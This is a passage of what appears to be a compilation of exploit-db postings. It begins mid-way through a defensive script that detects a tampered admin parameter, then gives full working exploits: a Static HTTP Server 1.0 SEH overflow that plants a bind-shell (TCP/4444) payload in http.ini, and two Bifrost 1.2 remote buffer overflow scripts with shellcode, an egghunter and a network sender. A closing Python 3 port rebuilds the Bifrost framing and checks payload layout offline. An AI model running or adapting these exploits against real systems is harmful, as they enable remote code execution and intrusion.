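ROLES = {"alice": "biggest", "bob": "second"}       # login -> role held server-side (constructed)
ADMIN_ROLE = "biggest"                              # the value check.php compares against


def is_admin_as_in_check_php(get_params, post_params):
    """Mirrors check.php lines 36-44: user_com is taken from GET, else POST, and compared."""
    user_com = get_params.get("user_com", "") or post_params.get("user_com", "")
    return user_com == ADMIN_ROLE


def is_admin_server_side(session_id):
    """Hardened: the role comes from the authenticated session; request data is never consulted."""
    login = SESSIONS.get(session_id)
    return login is not None and ROLES.get(login) == ADMIN_ROLE


def decide(url, session_id, post_params=None):
    """Run both decisions for one request so the difference is visible."""
    get_params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return {
        "check_php": is_admin_as_in_check_php(get_params, post_params or {}),
        "server_side": is_admin_server_side(session_id),
    }


# Combined-log-style lines with the session cookie appended as the last field (assumed format).
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3}) \S+ (?P<session>\S+)$'
)


def tampered_requests(log_lines):
    """Requests that supplied user_com=biggest from a session whose server-side role is not admin.
    A 200 on such a request means the bypass worked; anything else is still an attempt worth seeing."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        get_params = {k: v[0] for k, v in parse_qs(urlsplit(m["path"]).query).items()}
        if get_params.get("user_com") == ADMIN_ROLE and not is_admin_server_side(m["session"]):
            hits.append((m["session"], m["path"], int(m["status"])))
    return hits


# Constructed: bob first browses normally, then resubmits with user_com changed as in the exploit;
# alice holds the admin role server-side, so her identical request is legitimate.
SAMPLE_LOG = [
    '203.0.113.9 - - [27/Jun/2013:12:00:01 +0000] "GET /info.php?cookie=yes&user_com=second HTTP/1.1" 200 512 s-9c1d',
    '203.0.113.9 - - [27/Jun/2013:12:00:07 +0000] "GET /info.php?cookie=yes&user_com=biggest HTTP/1.1" 200 2048 s-9c1d',
    '198.51.100.3 - - [27/Jun/2013:12:01:00 +0000] "GET /info.php?cookie=yes&user_com=biggest HTTP/1.1" 200 2048 s-4f2a',
]

if __name__ == "__main__":
    print(decide("http://Example_Target/info.php?cookie=yes&user_com=biggest", "s-9c1d"))
    print(tampered_requests(SAMPLE_LOG))
```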
-
Author : Jacob Holcomb
Source : Static HTTP Server 1.0 - SEH Overflow
Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/7b16657e72825fc53b5072d4a1d04b7b-static-httpd.zip
Code :

#!/usr/bin/env python
import os
#
# Title************************Static HTTP Server SEH Overflow - HTTP Config - http_tiplist
# Discovered and Reported******June 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Static HTTP Server v1.0 (Listens on TCP/80)
# *****************************http://sourceforge.net/projects/static-httpd/?source=dlp
# Tested Platform*************Windows XP SP2
# CVE**************************Static HTTP Server 1.0 - SEH Overflow: Pending
#
# Notes:
# Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but
# I was unable to control the SEH handler with anything but configuration options in the http.ini.
#

def fileCreate():
    print "\n[*] Your current file directory is %s. " % os.getcwd()
    try:
        File = "http.ini"
        fileOpen = open(File, "w")
        print "[*] Configuration file %s will be written to %s." % (File, os.getcwd())
    except:
        print "\n[*] ERROR! There was an issue creating your file. Please make sure you have write access to %s!!!!!\n" % os.getcwd()
        raise SystemExit(1)
    return fileOpen

def main():
    NOP1 = "\x90" * 1691
    NOP2 = NOP1[0:349]
    prev = "\xEB\xF6\x90\x90"       # Short JMP -10 bytes
    Handler = "\x9E\x1D\x40\x00"    # 00401D9E httpd.exe
    jmp = "\xe9\x87\xee\xff\xff"    # FFFFEE87 # "\xe9\xA3\xfe\xff\xff"

    # 344 Byte Bind Shell TCP/4444
    shellcode = ("\xdb\xdd\xba\x81\x90\xd3\xb1\xd9\x74\x24\xf4\x5b\x2b\xc9" +
    "\xb1\x50\x31\x53\x18\x83\xeb\xfc\x03\x53\x95\x72\x26\x4d" +
    "\xff\x99\x84\x46\x06\xa2\xe8\x68\x98\xd6\x7b\xb3\x7c\x62" +
    "\xc6\x87\xf7\x08\xcc\x8f\x06\x1e\x45\x20\x10\x6b\x05\x9f" +
    "\x21\x80\xf3\x54\x15\xdd\x05\x85\x64\x21\x9c\xf5\x02\x61" +
    "\xeb\x02\xcb\xa8\x19\x0c\x09\xc7\xd6\x35\xd9\x3c\x3f\x3f" +
    "\x04\xb7\x60\x9b\xc7\x23\xf8\x68\xcb\xf8\x8e\x30\xcf\xff" +
    "\x7b\xcd\xc3\x74\xf2\xbe\x3f\x97\x64\xfc\x0e\x7c\x02\x89" +
    "\x33\xb2\x40\xcd\xbf\x39\x26\xd2\x12\xb6\x87\xe2\x32\xa1" +
    "\x89\xbd\xc4\xdd\xc6\xbe\x0e\x7b\xb4\x26\xc6\xb7\x08\xcf" +
    "\x61\xcb\x5e\x50\xd9\xd4\x4f\x06\x2a\xc7\x8c\xec\xfc\xe7" +
    "\xbb\x4c\x75\xf2\x22\xf2\x68\xf5\xa8\xa1\x18\x04\x52\x99" +
    "\xb4\xd1\xa5\xef\xe9\xb5\x4a\xd9\xa2\x6a\xe6\xb5\x17\xce" +
    "\x5b\x79\xc4\x2f\x8b\x1b\x82\xde\x70\x82\x01\x68\x69\xdf" +
    "\xcd\xce\x70\x90\xca\x58\x7a\x86\xbe\x76\xd5\x72\xc1\xa7" +
    "\xbd\xd8\x90\x66\xd7\x76\x15\xa0\x74\x2c\x16\x9d\x13\x2b" +
    "\xa1\x98\xad\xe4\xce\x73\x7d\x5f\x64\x29\x81\x8f\x17\xb9" +
    "\x9a\x49\xd1\x43\x32\x55\x0b\xe6\x43\x79\xd5\x63\xd8\x1c" +
    "\x71\x17\x4d\x68\x64\xbd\xdd\x33\x4f\x8e\x57\x24\xe5\x4a" +
    "\xe1\x49\xc8\x92\x02\x27\xd4\x51\xc8\xc6\x6a\x7a\x81\xba" +
    "\x10\xba\x0e\x6f\x4f\xd2\x22\x8e\x3c\x35\x3c\x1b\x06\xc5" +
    "\x14\xbf\xd1\x6b\xc8\x11\x8c\xe1\xeb\xc0\x7f\xa3\xba\x1d" +
    "\xaf\x23\x90\x3b\x4a\x7a\xb9\x44\x82\xe8\xc1\x44\x1d\x12" +
    "\xed\x30\x36\x10\x8d\x83\xdc\x17\x44\x59\xe3\x38\x01\xae" +
    "\x91\xbd\x8d\x1d\x5a\x6b\xce\x72")

    sploit = NOP2 + shellcode + NOP1 + jmp + prev + Handler

    File = fileCreate()

    Config = ("""
# HTTP Daemon config file
# GarajCode programed by Savu Andrei
# This is the configuration file

# You can configure the maximum number
# of simultanious connections
max_http_connections = 256

# The port on which the server will listen
http_port = 80

# Multiple connections from same computer
http_mcsc = 1

# Banned ip list - separed by ;
http_ubip = 0
# http_biplist = ""

# Trusted ip list - separed by ;
http_utip = 0
# http_tiplist = "%s"
""") % sploit

    File.write(Config)
    File.close()

if __name__ == "__main__":
    main()
-
Author : Mohamed Clay
Source : Bifrost 1.2d - Remote Buffer Overflow
Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/ecb723cd9b2dbd814745928f9185f6a9-BitFrost1.zip
Code :

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
import threading
import sys

def rc4crypt(data, key):
    # Plain RC4: the same routine encrypts and decrypts.
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

def bif_len(s):
    # Right-pad the hex string of the length to 8 nibbles.
    while len(s) < 8:
        s = s + "00"
    return s

def header(s):
    # 4-byte length header built from the padded hex string.
    a = (s[0] + s[1]).decode("hex")
    a += (s[2] + s[3]).decode("hex")
    a += (s[4] + s[5]).decode("hex")
    a += (s[6] + s[7]).decode("hex")
    return a

def random():
    # Trailing filler fields (8 x 1000 bytes, pipe separated).
    a = ""
    for i in range(0, 8):
        a += "A" * 1000 + "|"
    return a

def exploit():
    # Sent from a thread after the fake check-in below.
    s.sendall(out)

def usage():
    print "\n\n\t***************************"
    print "\t*   By : Mohamed Clay     *"
    print "\t*  Bifrost 1.2d Exploit   *"
    print "\t***************************\n"
    print "\t  Usage : ./bifrost1.2.1 host port"
    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"

if len(sys.argv) != 3:
    usage()
    exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])

# Hardcoded RC4 key used by the Bifrost server for its traffic.
key = "\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
xor = "\xB2\x9C\x51\xBB"  # we need this in order to bypass 0046A03E function
eip = "\x53\x93\x3A\x7E"  # jmp esp User32.dll

# Egghunter looking for the tag "w00t" (repeated twice in front of the payload).
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             "\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#calc.exe shellcode (badchars "\x00")
buf = "\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf += "\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf += "\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf += "\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf += "\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf += "\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf += "\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf += "\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf += "\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf += "\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf += "\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf += "\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf += "\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf += "\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf += "\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf += "\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf += "\xe1\x93\x28"

raw = (1000 - 533 - len(egghunter)) * "\x90"
raw2 = (1000 - 8 - len(buf)) * "\x41" + "|"

# Command byte 30 (0x1e), followed by the overflowing field and the egg + payload.
command = 30
tmp = hex(command).split("0x")[1]
data = (tmp.decode("hex") + "F" * 2 + " " * 511 + xor + "C" * 12 + eip + "A" * 8
        + egghunter + raw + "|" + " " * 1000 + "|" + "w00tw00t" + buf + raw2 + random())
out = rc4crypt(data, key)
l = header(bif_len(str(hex(len(data))).split("0x")[1]))
out = l + out

# Fake victim check-in so the server accepts the connection before the overflow.
data2 = "2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|"
out2 = rc4crypt(data2, key)
l = header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2 = l + out2

th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)

print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"
-
Author : Mohamed Clay
Source : http://www.exploit-db.com/exploits/26493/
Code :

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
import sys

def rc4crypt(data, key):
    # Plain RC4: the same routine encrypts and decrypts.
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

def bif_len(s):
    # Right-pad the hex string of the length to 8 nibbles.
    while len(s) < 8:
        s = s + "00"
    return s

def header(s):
    # 4-byte length header built from the padded hex string.
    a = (s[0] + s[1]).decode("hex")
    a += (s[2] + s[3]).decode("hex")
    a += (s[4] + s[5]).decode("hex")
    a += (s[6] + s[7]).decode("hex")
    return a

def random():
    # Trailing filler fields (8 x 1000 bytes, pipe separated).
    a = ""
    for i in range(0, 8):
        a += "A" * 1000 + "|"
    return a

def usage():
    print "\n\n\t***************************"
    print "\t*   By : Mohamed Clay     *"
    print "\t*  Bifrost 1.2.1 Exploit  *"
    print "\t***************************\n"
    print "\t  Usage : ./bifrost1.2.1 host port"
    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"

if len(sys.argv) != 3:
    usage()
    exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])

# Hardcoded RC4 key used by the Bifrost server for its traffic.
key = "\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
xor = "\xB2\x9C\x51\xBB"  # we need this in order to bypass 0046A03E function
eip = "\x53\x93\x3A\x7E"  # jmp esp User32.dll

# Egghunter looking for the tag "w00t" (repeated twice in front of the payload).
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             "\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#calc.exe shellcode (badchars "\x00")
buf = "\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf += "\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf += "\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf += "\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf += "\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf += "\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf += "\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf += "\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf += "\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf += "\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf += "\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf += "\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf += "\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf += "\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf += "\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf += "\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf += "\xe1\x93\x28"

raw = (1000 - 533 - len(egghunter)) * "\x90"
raw2 = (1000 - 8 - len(buf)) * "\x41" + "|"

# Command byte 30 (0x1e), followed by the overflowing field and the egg + payload.
# Note the offsets differ from the 1.2d build: 8 bytes before EIP, 12 after.
command = 30
tmp = hex(command).split("0x")[1]
data = (tmp.decode("hex") + "F" * 2 + " " * 511 + xor + "C" * 8 + eip + "A" * 12
        + egghunter + raw + "|" + " " * 1000 + "|" + "w00tw00t" + buf + raw2 + random())
out = rc4crypt(data, key)
l = header(bif_len(str(hex(len(data))).split("0x")[1]))
out = l + out

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)

print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"
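The two Bifrost posts above share the same framing (4-byte length header plus RC4 body under a fixed key) and the same egghunter/egg layout. As an added example that is not part of either post and not Mohamed Clay's code, the Python 3 block below ports that framing so it can be built and parsed offline, and runs the checks a practitioner would want before reusing such a payload: that the egghunter's tag matches the egg placed in front of the shellcode, that the shellcode follows the egg directly, and that no bad character (the posts name \x00) is present. The RC4 key and egghunter bytes are copied from the posts; the sample payload in demo() is constructed here with short fillers and an INT3 stand-in instead of the real shellcode. One caveat the block makes visible: header(bif_len(...)) in the posts right-pads the hex length with zeros, which is lossy (0x100 and 0x1000 encode identically), so declared_length() can only recover lengths whose hex form has no trailing zero nibble.

```python
#!/usr/bin/env python3
# Added example (editor's code, not the posted exploit): Python 3 port of the
# Bifrost frame construction used above, plus payload sanity checks.
# Constants below are copied from the posts; nothing here touches a network.

EGG = b"w00tw00t"
KEY = b"\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
EGGHUNTER = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A"
             b"\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"
             b"\xFF\xE7")


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def bifrost_header(length: int) -> bytes:
    """4-byte header as header(bif_len(...)) builds it in the posts: the hex
    string of the length is right-padded with zeros to 8 nibbles. Lossy:
    0x100 and 0x1000 both become 10 00 00 00."""
    return bytes.fromhex(format(length, "x").ljust(8, "0")[:8])


def declared_length(hdr: bytes) -> int:
    """Invert bifrost_header() by stripping the zero padding again
    (only exact when the real length has no trailing zero nibble)."""
    return int(hdr.hex().rstrip("0") or "0", 16)


def build_frame(plaintext: bytes, key: bytes = KEY) -> bytes:
    return bifrost_header(len(plaintext)) + rc4(plaintext, key)


def parse_frame(blob: bytes, key: bytes = KEY) -> dict:
    """Split a frame into header and body and decrypt the body."""
    body = rc4(blob[4:], key)
    return {"declared": declared_length(blob[:4]),
            "actual": len(body),
            "plaintext": body}


def egghunter_tag(hunter: bytes) -> bytes:
    """The 4-byte tag loaded by the `mov eax, imm32` (opcode 0xB8) inside the
    hunter; the payload must be prefixed with this tag twice."""
    i = hunter.find(b"\xb8")
    return hunter[i + 1:i + 5]


def check_payload(data: bytes, shellcode: bytes, egg: bytes = EGG,
                  badchars: bytes = b"\x00") -> dict:
    """Egg present exactly once, shellcode directly after it, no bad chars."""
    off = data.find(egg)
    after = data[off + len(egg):off + len(egg) + len(shellcode)]
    return {"egg_offset": off,
            "egg_count": data.count(egg),
            "shellcode_after_egg": off >= 0 and after == shellcode,
            "badchars_found": sorted({b for b in shellcode if b in badchars})}


def demo() -> dict:
    """Constructed stand-in for the exploit's `data` (same field order as the
    1.2d post, shorter fillers, INT3 bytes instead of the calc shellcode),
    run through framing, parsing and the payload checks."""
    xor = b"\xB2\x9C\x51\xBB"
    eip = b"\x53\x93\x3A\x7E"
    shellcode = b"\xcc" * 8   # constructed stand-in, not a real payload
    data = (b"\x1e" + b"FF" + b" " * 16 + xor + b"C" * 12 + eip + b"A" * 8
            + EGGHUNTER + b"|" + EGG + shellcode + b"|")
    parsed = parse_frame(build_frame(data))
    result = check_payload(parsed["plaintext"], shellcode)
    result.update(declared=parsed["declared"], actual=parsed["actual"],
                  roundtrip=parsed["plaintext"] == data)
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Because the key is fixed in the server, the same decoder applied to captured Bifrost C2 traffic recovers the command stream; the length ambiguity means a capture-side parser should trust the socket framing (or the actual body length) rather than the declared header value.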